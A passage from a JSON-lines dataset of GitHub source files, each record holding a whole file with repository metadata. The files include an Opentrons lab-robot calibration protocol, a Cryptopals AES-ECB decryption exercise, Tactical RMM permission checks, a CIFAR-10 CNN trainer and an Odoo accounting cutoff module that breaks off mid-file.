\"+str(games_2020))\noutfile.close()","repo_name":"thefisk/pigskinpredictor","sub_path":"predictor/scripts/create_gameid_dict.py","file_name":"create_gameid_dict.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"32507889972","text":"k = 1\nwhile True:\n try:\n N = int(input())\n v = list(map(float, input().split()))\n vOrdenado = []\n for n in v:\n vOrdenado.append(n)\n vOrdenado.sort(reverse = True)\n senha = ''\n for _ in range(N):\n senha+= str(v.index(vOrdenado[_]))\n v[v.index(vOrdenado[_])] = 1\n print(f\"Caso {k}: {senha}\")\n k+=1\n except EOFError:\n break\n","repo_name":"lucas-albuq/PEOO","sub_path":"ListaPoo04B/2252.py","file_name":"2252.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"39735637522","text":"from opentrons import protocol_api\nfrom opentrons.types import Point\nfrom opentrons.drivers.rpi_drivers import gpio\nimport time\nimport math\nimport os\nimport subprocess\nimport json\n\n# metadata\nmetadata = {\n 'protocolName': 'S3 Station A Protocol 3 lysates Version 1',\n 'author': 'Sara , Miguel ',\n 'source': 'Custom Protocol Request',\n 'apiLevel': '2.3'\n}\n\n\n# Parameters to adapt the protocol\n# Warning writing any Parameters below this line.\n# It will be deleted if opentronsWeb is used.\n\nNUM_SAMPLES = 96\nLYSATE_LABWARE = 'opentrons plastic 2ml tubes'\nPLATE_LABWARE = 'nest deep generic well plate'\nTIPS1000 = 'opentrons'\nVOLUME_LYSATE = 400\nBEADS = False\nLANGUAGE = 'esp'\nRESET_TIPCOUNT = False\n\n# End Parameters to adapt the protocol\n\n## global vars\n## initialize robot object\nrobot = None\n# default var for drop tip switching\nswitch = True\n# initialize tip_log dictionary\ntip_log = {}\ntip_log['count'] = {}\ntip_log['tips'] = {}\ntip_log['max'] = {}\n\n\n# End Parameters to adapt the protocol\n\n\"\"\"\nNUM_SAMPLES is the number of samples, must be an integer number\n\nTIPS 1000\n biotix\n opentrons\n\nLYSATE_LABWARE must be one of the following:\n opentrons plastic 2ml tubes\n\nPLATE_LABWARE must be one of the following:\n opentrons deep generic well plate\n nest deep generic well plate\n vwr deep generic well plate\n\"\"\"\n\nTIPS1000_LW_DICT = {\n 'biotix': 'biotix_96_tiprack_1000ul',\n 'opentrons': 'opentrons_96_tiprack_1000ul'\n}\n\nLY_LW_DICT = {\n 'opentrons plastic 2ml tubes': 'opentrons_24_tuberack_generic_2ml_screwcap'\n}\n\nPL_LW_DICT = {\n 'opentrons deep generic well plate': 'usascientific_96_wellplate_2.4ml_deep',\n 'nest deep generic well plate': 'nest_96_deepwellplate_2000ul',\n 'vwr deep generic well plate': 'vwr_96_deepwellplate_2000ul'\n}\n\nLYSTUBE_LW_DICT = {\n # Radius of each possible tube\n '2ml tubes': 4\n}\n\nLANGUAGE_DICT = {\n 'esp': 'esp',\n 'eng': 'eng'\n}\n\nif LANGUAGE_DICT[LANGUAGE] == 'eng':\n VOICE_FILES_DICT = {\n 'start': './data/sounds/started_process.mp3',\n 'finish': './data/sounds/finished_process.mp3',\n 'close_door': './data/sounds/close_door.mp3',\n 'replace_tipracks': './data/sounds/replace_tipracks.mp3',\n 'empty_trash': './data/sounds/empty_trash.mp3'\n }\nelif LANGUAGE_DICT[LANGUAGE] == 'esp':\n VOICE_FILES_DICT = {\n 'start': './data/sounds/started_process_esp.mp3',\n 'finish': './data/sounds/finished_process_esp.mp3',\n 'close_door': './data/sounds/close_door_esp.mp3',\n 'replace_tipracks': './data/sounds/replace_tipracks_esp.mp3',\n 'empty_trash': './data/sounds/empty_trash_esp.mp3'\n }\n\n# Function definitions\ndef check_door():\n return gpio.read_window_switches()\n\ndef confirm_door_is_closed():\n if not robot.is_simulating():\n #Check if door is opened\n if check_door() == False:\n #Set light color to red and pause\n gpio.set_button_light(1,0,0)\n robot.pause()\n voice_notification('close_door')\n time.sleep(5)\n confirm_door_is_closed()\n else:\n #Set light color to green\n gpio.set_button_light(0,1,0)\n\ndef finish_run():\n voice_notification('finish')\n #Set light color to blue\n gpio.set_button_light(0,0,1)\n\ndef voice_notification(action):\n if not robot.is_simulating():\n fname = VOICE_FILES_DICT[action]\n if os.path.isfile(fname) is True:\n subprocess.run(\n ['mpg123', fname],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE\n )\n else:\n robot.comment(f\"Sound file does not exist. Call the technician\")\n\ndef reset_tipcount():\n os.remove('/data/A/tip_log.json', 'w')\n\ndef retrieve_tip_info(pip,tipracks,file_path = '/data/A/tip_log.json'):\n global tip_log\n if not tip_log['count'] or pip not in tip_log['count']:\n tip_log['count'][pip] = 0\n if not robot.is_simulating():\n if os.path.isfile(file_path):\n with open(file_path) as json_file:\n data = json.load(json_file)\n if 'P1000' in str(pip):\n tip_log['count'][pip] = data['tips1000']\n elif 'P300' in str(pip):\n tip_log['count'][pip] = data['tips300']\n elif 'P20' in str(pip):\n tip_log['count'][pip] = data['tips20']\n\n if \"8-Channel\" in str(pip):\n tip_log['tips'][pip] = [tip for rack in tipracks for tip in rack.rows()[0]]\n else:\n tip_log['tips'][pip] = [tip for rack in tipracks for tip in rack.wells()]\n\n tip_log['max'][pip] = len(tip_log['tips'][pip])\n\n return tip_log\n\ndef save_tip_info(file_path = '/data/A/tip_log.json'):\n data = {}\n if not robot.is_simulating():\n if os.path.isfile(file_path):\n os.rename(file_path,file_path + \".bak\")\n for pip in tip_log['count']:\n if \"P1000\" in str(pip):\n data['tips1000'] = tip_log['count'][pip]\n elif \"P300\" in str(pip):\n data['tips300'] = tip_log['count'][pip]\n elif \"P20\" in str(pip):\n data['tips20'] = tip_log['count'][pip]\n\n with open(file_path, 'a+') as outfile:\n json.dump(data, outfile)\n\ndef pick_up(pip,tiprack):\n ## retrieve tip_log\n global tip_log\n if not tip_log:\n tip_log = {}\n tip_log = retrieve_tip_info(pip,tiprack)\n if tip_log['count'][pip] == tip_log['max'][pip]:\n voice_notification('replace_tipracks')\n robot.pause('Replace ' + str(pip.max_volume) + 'µl tipracks before \\\nresuming.')\n confirm_door_is_closed()\n pip.reset_tipracks()\n tip_log['count'][pip] = 0\n pip.pick_up_tip(tip_log['tips'][pip][tip_log['count'][pip]])\n tip_log['count'][pip] += 1\n\ndef drop(pip):\n global switch\n if \"8-Channel\" not in str(pip):\n side = 1 if switch else -1\n drop_loc = robot.loaded_labwares[12].wells()[0].top().move(Point(x=side*20))\n pip.drop_tip(drop_loc,home_after=False)\n switch = not switch\n else:\n drop_loc = robot.loaded_labwares[12].wells()[0].top().move(Point(x=20))\n pip.drop_tip(drop_loc,home_after=False)\n\ndef transfer_samples(sources, dests, pip, tiprack):\n # height for aspiration has to be different depending if you ar useing tubes or wells\n if 'strip' in LYSATE_LABWARE or 'plate' in LYSATE_LABWARE:\n height = 1.5\n else:\n height = 2\n # transfer\n for s, d in zip(sources, dests):\n pick_up(pip,tiprack)\n pip.transfer(VOLUME_LYSATE, s.bottom(height), d.bottom(15), air_gap=20, new_tip='never')\n if BEADS:\n pip.mix(3,400,d.bottom(4))\n #pip.blow_out(d.top(-2))\n pip.aspirate(50, d.top(-2))\n drop(pip)\n\n# RUN PROTOCOL\ndef run(ctx: protocol_api.ProtocolContext):\n global robot\n robot = ctx\n\n # check if tipcount is being reset\n if RESET_TIPCOUNT:\n reset_tipcount()\n\n # load tips\n tips1000 = [\n robot.load_labware(TIPS1000_LW_DICT[TIPS1000], slot,\n '1000µl filter tiprack')\n for slot in ['3']\n ]\n\n # load pipette\n p1000 = robot.load_instrument(\n 'p1000_single_gen2', 'left', tip_racks=tips1000)\n\n # check source (LYSATE) labware type\n if LYSATE_LABWARE not in LY_LW_DICT:\n raise Exception('Invalid LYSATE_LABWARE. Must be one of the \\\nfollowing:\\nopentrons plastic 2ml tubes')\n # load LYSATE labware\n if 'plate' in LYSATE_LABWARE:\n source_racks = robot.load_labware(\n LY_LW_DICT[LYSATE_LABWARE], '1',\n 'RNA LYSATE labware')\n else:\n source_racks = [\n robot.load_labware(LY_LW_DICT[LYSATE_LABWARE], slot,\n 'sample LYSATE labware ' + str(i+1))\n for i, slot in enumerate(['4', '1', '5', '2'])\n ]\n\n # check plate\n if PLATE_LABWARE not in PL_LW_DICT:\n raise Exception('Invalid PLATE_LABWARE. Must be one of the \\\nfollowing:\\nopentrons deep generic well plate\\nnest deep generic well plate\\nvwr deep generic well plate')\n\n # load pcr plate\n wells_plate = robot.load_labware(PL_LW_DICT[PLATE_LABWARE], 10,\n 'sample LYSATE well plate ')\n\n # setup sources and dests\n sources = [tube for s in source_racks for tube in s.wells()]\n dests = wells_plate.wells()\n\n # check top-left and bottom-right well of each labware with each pipette which uses them\n pick_up(p1000, tips1000)\n for position in [sources[0], sources[23], sources[24], sources[47], sources[48], sources[71], sources[72], sources[-1]]:\n p1000.move_to(position.top())\n robot.pause(f\"Is it at the top of the well?\")\n p1000.aspirate(VOLUME_LYSATE, position.bottom(2))\n p1000.move_to(position.top())\n robot.pause(f\"Did it aspirate correctly?\")\n p1000.dispense(VOLUME_LYSATE, position.top(-2))\n p1000.move_to(position.top())\n robot.pause(f\"Did it dispense all the liquid?\")\n for position in [dests[0], dests[-1]]:\n p1000.move_to(position.top())\n robot.pause(f\"Is it at the top of the well?\")\n drop(p1000)\n\n # track final used tip\n save_tip_info()\n","repo_name":"BU-ISCIII/opentrons_covid19","sub_path":"calibration_check/stationA_protocol3_lysates_S3_calibration.py","file_name":"stationA_protocol3_lysates_S3_calibration.py","file_ext":"py","file_size_in_byte":9318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38119840460","text":"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nimport base64\nfrom cryptography.hazmat.primitives import padding\nfrom cryptography.hazmat.backends import default_backend\n\n# Load the encrypted data from the file\nwith open(\"7.txt\", \"rb\") as f:\n encrypted_data = f.read()\n\n# Decode the encrypted data from Base64\nencrypted_data = base64.b64decode(encrypted_data)\n\n# Create a Cipher object using the AES algorithm and the ECB mode\ncipher = Cipher(algorithms.AES(b\"YELLOW SUBMARINE\"), modes.ECB(), backend=default_backend())\n\n# Create a decryption context\ndecryptor = cipher.decryptor()\n\n# Decrypt the encrypted data\npadded_plaintext = decryptor.update(encrypted_data) + decryptor.finalize()\n\n# Remove the padding from the plaintext\nunpadder = padding.PKCS7(128).unpadder()\nplaintext = unpadder.update(padded_plaintext)\nplaintext += unpadder.finalize()\n\n# Print the plaintext\nprint(plaintext)\n","repo_name":"0xspringtime/cryptopals","sub_path":"1-7.py","file_name":"1-7.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"25791516655","text":"import random\n\n\"\"\"The goal of this code is to check an array and see if the sum of 2 of its element add up to a target\nand if so, return their index in the array.\nWe create the array based on user input \"\"\"\n\ndef finder(n):\n print('your array is : ' + str(n))\n res = [0]\n for i in range(len(n)):\n num = n[i]\n delta = target-num\n if delta > 0 and delta in n[i+1:]:\n res.append([n.index(n[i],i),n.index(delta,i+1)])\n res[0] += 1\n if res[0] > 0:\n return res\n else:\n print(\"There is no solution\")\n \ndef rando(s,m):\n arr = []\n for _ in range(s):\n arr.append(random.randrange(1,m+1))\n return finder(arr)\n\nsize = int(input('What\\'s the size of the array'))\nmax = int(input('What\\'s the maximum int in the array'))\ntarget = random.randrange(max/2,max)\nprint(\"the target is : \" + str(target))\nresult = rando(size,max)\nif (result != None):\n print(f\"there is {str(result[0])} solution :\")\n for i in range(1,result[0]+1):\n print(f\"You can add the index {result[i][0]} and {result[i][1]}\")\n","repo_name":"Otiston/Random-code","sub_path":"Find my sum index.py","file_name":"Find my sum index.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39610092387","text":"from rest_framework import permissions\n\nfrom tacticalrmm.permissions import (\n _has_perm,\n _has_perm_on_agent,\n _has_perm_on_client,\n _has_perm_on_site,\n)\n\n\nclass ChecksPerms(permissions.BasePermission):\n def has_permission(self, r, view) -> bool:\n if r.method in (\"GET\", \"PATCH\"):\n if \"agent_id\" in view.kwargs.keys():\n return _has_perm(r, \"can_list_checks\") and _has_perm_on_agent(\n r.user, view.kwargs[\"agent_id\"]\n )\n else:\n return _has_perm(r, \"can_list_checks\")\n else:\n return _has_perm(r, \"can_manage_checks\")\n\n\nclass RunChecksPerms(permissions.BasePermission):\n def has_permission(self, r, view) -> bool:\n return _has_perm(r, \"can_run_checks\") and _has_perm_on_agent(\n r.user, view.kwargs[\"agent_id\"]\n )\n\n\nclass BulkRunChecksPerms(permissions.BasePermission):\n def has_permission(self, r, view) -> bool:\n if not _has_perm(r, \"can_run_checks\"):\n return False\n\n if view.kwargs[\"target\"] == \"client\":\n return _has_perm_on_client(user=r.user, client_id=view.kwargs[\"pk\"])\n\n elif view.kwargs[\"target\"] == \"site\":\n return _has_perm_on_site(user=r.user, site_id=view.kwargs[\"pk\"])\n\n return False\n","repo_name":"amidaware/tacticalrmm","sub_path":"api/tacticalrmm/checks/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":2312,"dataset":"github-code","pt":"48"} +{"seq_id":"24710534927","text":"from __future__ import print_function\n\n__revision__ = \"$Id$\"\n\nimport getopt\nimport sys\n\nfrom invenio.base.helpers import with_app_context\n\ndef usage(exitcode=1, msg=\"\"):\n \"\"\"Prints usage info.\"\"\"\n if msg:\n print(\"Error: %s.\" % msg, file=sys.stderr)\n print(file=sys.stderr)\n print(\"\"\"Usage: %s [options]\n\nGeneral options:\n -h, --help\\t\\tprint this help\n -V, --version\\t\\tprint version number\n\nAuthentication options:\n -u, --user=USER\\tUser name needed to perform the administrative task\n\nOption to administrate authorizations:\n -a, --add\\t\\tadd default authorization settings\n -c, --compile\\t\\tcompile firewall like role definitions (FireRole)\n -r, --reset\\t\\treset to default settings\n -D, --demo\\t\\tto be used with -a or -r in order to consider demo site authorizations\n\"\"\" % sys.argv[0], file=sys.stderr)\n sys.exit(exitcode)\n\n\n@with_app_context()\ndef main():\n \"\"\"Main function that analyzes command line input and calls whatever\n is appropriate. \"\"\"\n\n from invenio.modules.access.firerole import repair_role_definitions\n from invenio.modules.access.control import (acc_add_default_settings,\n acc_reset_default_settings)\n from invenio.base.globals import cfg\n from invenio.legacy.bibsched.bibtask import authenticate\n\n DEF_DEMO_USER_ROLES = cfg.get('DEF_DEMO_USER_ROLES', tuple())\n DEF_DEMO_ROLES = cfg.get('DEF_DEMO_ROLES', tuple())\n DEF_DEMO_AUTHS = cfg.get('DEF_DEMO_AUTHS', tuple())\n\n ## parse command line:\n # set user-defined options:\n options = {'user' : '', 'reset' : 0, 'compile' : 0, 'add' : 0, 'demo' : 0}\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"hVu:racD\",\n [\"help\", \"version\", \"user=\",\n \"reset\", \"add\", \"compile\", \"demo\"])\n except getopt.GetoptError as err:\n usage(1, err)\n try:\n for opt in opts:\n if opt[0] in (\"-h\", \"--help\"):\n usage(0)\n elif opt[0] in (\"-V\", \"--version\"):\n print(__revision__)\n sys.exit(0)\n elif opt[0] in (\"-u\", \"--user\"):\n options[\"user\"] = opt[1]\n elif opt[0] in (\"-r\", \"--reset\"):\n options[\"reset\"] = 1\n elif opt[0] in (\"-a\", \"--add\"):\n options[\"add\"] = 1\n elif opt[0] in (\"-c\", \"--compile\"):\n options[\"compile\"] = 1\n elif opt[0] in (\"-D\", \"--demo\"):\n options[\"demo\"] = 1\n else:\n usage(1)\n if options['add'] or options['reset'] or options['compile']:\n #if acca.acc_get_action_id('cfgwebaccess'):\n # # Action exists hence authentication works :-)\n # options['user'] = authenticate(options['user'],\n # authorization_msg=\"WebAccess Administration\",\n # authorization_action=\"cfgwebaccess\")\n if options['reset'] and options['demo']:\n acc_reset_default_settings(\n [cfg['CFG_SITE_ADMIN_EMAIL']], DEF_DEMO_USER_ROLES,\n DEF_DEMO_ROLES, DEF_DEMO_AUTHS)\n print(\"Reset default demo site settings.\")\n elif options['reset']:\n acc_reset_default_settings([cfg['CFG_SITE_ADMIN_EMAIL']])\n print(\"Reset default settings.\")\n elif options['add'] and options['demo']:\n acc_add_default_settings(\n [cfg['CFG_SITE_ADMIN_EMAIL']], DEF_DEMO_USER_ROLES,\n DEF_DEMO_ROLES, DEF_DEMO_AUTHS)\n print(\"Added default demo site settings.\")\n elif options['add']:\n acc_add_default_settings([cfg['CFG_SITE_ADMIN_EMAIL']])\n print(\"Added default settings.\")\n if options['compile']:\n repair_role_definitions()\n print(\"Compiled firewall like role definitions.\")\n else:\n usage(1, \"You must specify at least one command\")\n except StandardError as e:\n from invenio.ext.logging import register_exception\n register_exception()\n usage(e)\n return\n\n### okay, here we go:\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"chokribr/invenio","sub_path":"invenio/modules/access/scripts/webaccessadmin.py","file_name":"webaccessadmin.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73878014224","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport torch\n\nfrom monai.data import DataLoader\n\n\nclass IndexTracker(object):\n \"\"\"\n Image Slices Viewer\n Scroll through 2D image slices of a 3D array.\n https://matplotlib.org/3.1.0/gallery/event_handling/image_slices_viewer.html\n \"\"\"\n def __init__(self, ax, X):\n self.ax = ax\n\n self.X = X\n rows, cols, self.slices = X.shape\n self.ind = self.slices//2\n\n self.im = ax.imshow(self.X[:, :, self.ind], cmap='gray')\n self.update()\n\n def onscroll(self, event):\n if event.button == 'up':\n self.ind = (self.ind + 1) % self.slices\n else:\n self.ind = (self.ind - 1) % self.slices\n self.update()\n\n def update(self):\n self.im.set_data(self.X[:, :, self.ind])\n self.ax.set_ylabel('slice %s' % self.ind)\n self.im.axes.figure.canvas.draw()\n\n\ndef show3(volume, label='use scroll wheel to navigate images', ax=None, do_show=True, seg=None):\n ax = ax or plt.gca()\n fig = plt.gcf()\n if seg is not None:\n volume = np.append(volume, seg * np.max(volume), axis=1)\n tracker = IndexTracker(ax, volume)\n ax.set_title(label)\n fig.canvas.mpl_connect('scroll_event', tracker.onscroll)\n if do_show:\n plt.show()\n return fig\n\n\ndef show_element(dataset, number_of_examples=1):\n check_loader = DataLoader(dataset)\n for i, batch_data in enumerate(check_loader):\n image, label = (batch_data[\"image\"][0][0], batch_data[\"label\"][0][0])\n show3(np.append(image, label * torch.max(image), axis=1))\n if i+1 == number_of_examples:\n break\n","repo_name":"alexbagur/pancreas-segmentation-ukbb","sub_path":"visual.py","file_name":"visual.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31098128223","text":"# /usr/bin/env python\n# encoding=utf-8\n\nimport json\n\nfrom emotion_classifiers import EmotionDictClassifier\n\nfrom bottle import route, request\n\nds = EmotionDictClassifier()\n\n\n@route('/emotion', method=\"POST\")\ndef index():\n query = request.forms.get(\"query\")\n score = ds.analyse_sentence(query, None, False)\n datas = {\"score\": score}\n json_data = json.dumps(datas)\n return json_data\n","repo_name":"Azure/CustomerReviewDataAnalyticsTutorial","sub_path":"src/Emotion/src/emotion_bottle.py","file_name":"emotion_bottle.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"27133199891","text":"from jrlib import jf\nfrom api_base.contact.base_method import BaseContact\n\n\nclass InheritanceContactPhone(BaseContact):\n phone = jf.Str()\n\n def execute(self):\n return {\n \"user_id\": self.user_id,\n \"comment\": self.comment,\n \"phone\": self.phone,\n }\n\n def validate(self):\n super(InheritanceContactPhone, self).validate()\n if not self.phone or len(self.phone) != self.user_id:\n raise ValueError(\"Error phone lenght\")\n","repo_name":"katsko/jrlib_steps","sub_path":"api/inheritance_contact_phone/method.py","file_name":"method.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28874886185","text":"import sys\nimport matplotlib.pyplot as plt\n\nfrom tensorflow.keras.datasets import cifar10\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, Flatten, Dense, Dropout, MaxPooling2D, BatchNormalization\nfrom tensorflow.keras.optimizers import SGD\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\nimport os\n\n# os.environ[\"KERAS_BACKEND\"] = \"plaidml.keras.backend\"\n# from keras.layers import Conv2D, Flatten, Dense, Dropout, MaxPooling2D, BatchNormalization\n# from keras.models import Sequential\n# from keras.optimizers import SGD\n\n\nclass CNNmodel2(object):\n\n def __init__(self, img_x, img_y, channels, num_classes, name, epochs=1):\n\n self.img_x = img_x\n self.img_y = img_y\n\n self.channels = channels\n self.num_classes = num_classes\n\n self.name = name\n\n self.epochs = epochs\n self.opt = SGD(lr=0.001, momentum=0.9)\n\n def model(self):\n\n model = Sequential(name=self.name)\n model.add(Conv2D(32, kernel_size=(3, 3), kernel_initializer=\"he_uniform\",\n activation=\"relu\", padding=\"same\", input_shape=(self.img_x, self.img_y, self.channels)))\n model.add(BatchNormalization())\n model.add(Conv2D(32, kernel_size=(3, 3), kernel_initializer=\"he_uniform\", activation=\"relu\", padding=\"same\"))\n model.add(BatchNormalization())\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.2))\n\n model.add(Conv2D(64, kernel_size=(3, 3), kernel_initializer=\"he_uniform\",\n activation=\"relu\", padding=\"same\"))\n model.add(BatchNormalization())\n model.add(Conv2D(64, kernel_size=(3, 3), kernel_initializer=\"he_uniform\",\n activation=\"relu\", padding=\"same\"))\n model.add(BatchNormalization())\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.3))\n\n model.add(Conv2D(128, kernel_size=(3, 3), kernel_initializer=\"he_uniform\",\n activation=\"relu\", padding=\"same\"))\n model.add(BatchNormalization())\n model.add(Conv2D(128, kernel_size=(3, 3), kernel_initializer=\"he_uniform\",\n activation=\"relu\", padding=\"same\"))\n model.add(BatchNormalization())\n\n model.add(Flatten())\n model.add(Dropout(0.4))\n\n model.add(Dense(128, activation=\"relu\", kernel_initializer=\"he_uniform\"))\n model.add(BatchNormalization())\n model.add(Dropout(0.5))\n model.add(Dense(self.num_classes, activation=\"softmax\"))\n\n model.compile(optimizer=self.opt, loss=\"categorical_crossentropy\", metrics=['accuracy'])\n\n return model\n\n def evaluate(self, X, y, model):\n evaluation = model.evaluate(X, y)\n return evaluation\n\n @staticmethod\n def summarize_diagnostics(hist):\n\n plt.subplot(221)\n plt.title(\"Cross Entropy Loss\")\n plt.plot(hist.history['loss'], color='blue', label='train')\n plt.plot(hist.history['val_loss'], color='orange', label='test')\n\n plt.subplot(212)\n plt.title(\"Classification accuracy\")\n plt.plot(hist.history['accuracy'], color='blue', label='train')\n plt.plot(hist.history['val_accuracy'], color='orange', label='test')\n\n path = sys.argv[0].split('/')[-1]\n plt.savefig(path + \"_plot.png\")\n plt.close()\n\n\nif __name__ == '__main__':\n\n (X_train, y_train), (X_test, y_test) = cifar10.load_data()\n\n img_cols, img_rows, channels = 32, 32, 3\n num_classes = 10\n\n X_train = X_train / 255\n X_test = X_test / 255\n\n X_train = X_train.reshape((-1, img_rows, img_cols, channels))\n X_test = X_test.reshape((-1, img_rows, img_cols, channels))\n\n y_train = to_categorical(y_train, num_classes)\n y_test = to_categorical(y_test, num_classes)\n\n plt.figure(figsize=(10, 10))\n\n plt.subplot(221)\n plt.imshow(X_train[1].reshape(img_rows, img_cols, channels))\n\n plt.subplot(222)\n plt.imshow(X_test[21].reshape(img_rows, img_cols, channels))\n\n plt.subplot(223)\n plt.imshow(X_test[44].reshape(img_rows, img_cols, channels))\n\n plt.subplot(224)\n plt.imshow(X_train[54].reshape(img_rows, img_cols, channels))\n\n plt.show()\n datagen = ImageDataGenerator(width_shift_range=0.1, height_shift_range=0.1, horizontal_flip=True)\n\n steps = int(X_train.shape[0] / 64)\n\n it_data = datagen.flow(X_train, y_train, batch_size=64)\n\n CNN = CNNmodel2(img_rows, img_cols, channels, num_classes, \"CNN_model_cifar\")\n CNN_model = CNN.model()\n history = CNN_model.fit(it_data, validation_data=(X_test, y_test), steps_per_epoch=steps, epochs=150, verbose=1)\n\n evaluation = CNN.evaluate(X_test, y_test, CNN_model)\n print(\"\\n%s %.2f%%\" % (CNN_model.metrics_names[1], evaluation[1] * 100))\n\n CNNmodel2.summarize_diagnostics(history)\n\n ask = input(\"Press S to save model to drive...\")\n\n if ask.upper() == \"S\":\n saved_model = CNN_model.to_json()\n with open(\"CNN_model_cifar.json\", \"w\") as json_file:\n json_file.write(saved_model)\n CNN_model.save_weights('CNN_model_cifar.h5')\n\n\n","repo_name":"Dimanssional/Adversial-Attacks-Methods","sub_path":"CNN_CIFAR.py","file_name":"CNN_CIFAR.py","file_ext":"py","file_size_in_byte":5164,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28763420654","text":"import osmnx as ox\nimport networkx as nx\nimport json\n\n# Specify the name of the place, and the transport mode\nplace_name = \"Istanbul, Turkey\"\nnetwork_type = 'walk'\n\n# Create a graph from the place\nG = ox.graph_from_place(place_name, network_type=network_type)\n\n# Convert graph to NetworkX format\nG_nx = nx.Graph(G)\n\n# Convert nodes and edges to dictionaries\nnodes = []\nedges = []\nfor node_id, node_data in G_nx.nodes(data=True):\n nodes.append({\n 'id': node_id,\n 'x': node_data['x'],\n 'y': node_data['y']\n })\n\nfor u, v, edge_data in G_nx.edges(data=True):\n edges.append({\n 'source': u,\n 'target': v,\n 'length': edge_data['length']\n })\n\n# Create a dictionary with graph data\ngraph_data = {\n 'nodes': nodes,\n 'edges': edges\n}\n\n# Save the graph data as JSON file\nwith open(\"istanbul_graph.json\", 'w') as f:\n json.dump(graph_data, f)\n","repo_name":"SametHaymana/geoRouteApi","sub_path":"scripts/GenerateDirectJson.py","file_name":"GenerateDirectJson.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41089492859","text":"from dateutil.relativedelta import relativedelta\n\nfrom odoo import _, api, fields, models\nfrom odoo.exceptions import UserError\nfrom odoo.tools import float_compare, float_is_zero\n\n\nclass AccountCutoff(models.Model):\n _inherit = \"account.cutoff\"\n\n picking_interval_days = fields.Integer(\n string=\"Picking Analysis Interval\",\n default=lambda self: self._default_picking_interval_days(),\n help=\"To generate the accruals based on pickings, Odoo will \"\n \"analyse all the pickings between the cutoff date and N \"\n \"days before. N is the Picking Analysis Interval.\",\n )\n\n _sql_constraints = [\n (\n \"picking_interval_days_positive\",\n \"CHECK(picking_interval_days > 0)\",\n \"The value of the field 'Picking Analysis Interval' must \"\n \"be strictly positive.\",\n )\n ]\n\n @api.model\n def _default_picking_interval_days(self):\n return self.env.company.default_cutoff_accrual_picking_interval_days\n\n def picking_prepare_cutoff_line(self, vdict, account_mapping):\n dpo = self.env[\"decimal.precision\"]\n assert self.cutoff_type in (\n \"accrued_expense\",\n \"accrued_revenue\",\n ), \"The field 'cutoff_type' has a wrong value\"\n qty_prec = dpo.precision_get(\"Product Unit of Measure\")\n qty = vdict[\"precut_delivered_qty\"] - vdict[\"precut_invoiced_qty\"]\n if float_is_zero(qty, precision_digits=qty_prec):\n return False\n\n company_currency = self.company_currency_id\n currency = vdict[\"currency\"]\n sign = self.cutoff_type == \"accrued_expense\" and -1 or 1\n amount = qty * vdict[\"price_unit\"] * sign\n amount_company_currency = vdict[\"currency\"]._convert(\n amount, company_currency, self.company_id, self.cutoff_date\n )\n\n # Use account mapping\n account_id = vdict[\"account_id\"]\n if account_id in account_mapping:\n accrual_account_id = account_mapping[account_id]\n else:\n accrual_account_id = account_id\n vals = {\n \"parent_id\": self.id,\n \"partner_id\": vdict[\"partner\"].id,\n \"name\": vdict[\"name\"],\n \"account_id\": account_id,\n \"cutoff_account_id\": accrual_account_id,\n \"analytic_account_id\": vdict[\"analytic_account_id\"],\n \"currency_id\": vdict[\"currency\"].id,\n \"quantity\": qty,\n \"price_unit\": vdict[\"price_unit\"],\n \"amount\": amount,\n \"cutoff_amount\": amount_company_currency,\n \"price_origin\": vdict.get(\"price_origin\"),\n }\n\n if vdict[\"taxes\"] and self.company_id.accrual_taxes:\n # vdict[\"price_unit\"] is a price without tax,\n # so I set handle_price_include=False\n tax_compute_all_res = vdict[\"taxes\"].compute_all(\n vdict[\"price_unit\"],\n currency=currency,\n quantity=qty * sign,\n product=vdict[\"product\"],\n partner=vdict[\"partner\"],\n handle_price_include=False,\n )\n vals[\"tax_line_ids\"] = self._prepare_tax_lines(\n tax_compute_all_res, self.company_currency_id\n )\n return vals\n\n def order_line_update_oline_dict(self, order_line, order_type, oline_dict):\n assert order_line not in oline_dict\n dpo = self.env[\"decimal.precision\"]\n qty_prec = dpo.precision_get(\"Product Unit of Measure\")\n # These fields have the same name on PO and SO\n order = order_line.order_id\n product = order_line.product_id\n product_uom = product.uom_id\n moves = order_line.move_ids\n ilines = order_line.invoice_lines\n oline_dict[order_line] = {\n \"precut_delivered_qty\": 0.0, # in product_uom\n \"precut_invoiced_qty\": 0.0, # in product_uom\n \"name\": _(\n \"%(order_name)s: %(order_line_name)s\",\n order_name=order.name,\n 